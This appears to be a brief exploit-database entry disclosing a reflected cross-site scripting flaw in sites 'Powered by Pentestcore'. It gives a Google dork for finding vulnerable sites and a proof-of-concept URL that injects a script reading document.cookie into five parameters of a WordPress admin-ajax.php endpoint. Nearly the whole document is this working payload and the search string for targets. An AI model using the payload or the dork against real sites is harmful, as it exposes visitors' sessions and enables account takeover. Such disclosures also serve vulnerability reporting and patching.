**************************** #Exploit Title: PENTESTCORE - Cross Site Scripting Vulnerability (XSS) #Date: 2020-10-01 #Exploit Author: Mahdi Karimi #Vendor Homepage: https://pentestcore.com #Google Dork: "Powered by Pentestcore" #Tested On: windows 10 Proof of Concept: Search google Dork: "Powered by Pentestcore" https://pentestcore.com/wp-admin/admin-ajax.php?action=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E&post_id=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E&nonce=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E&is_comment=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E&disabled=%3Cscript%3Eprompt%28document.cookie%29%3C%2Fscript%3E ************************************************** #Discovered by: Mahdi Karimi **************************************************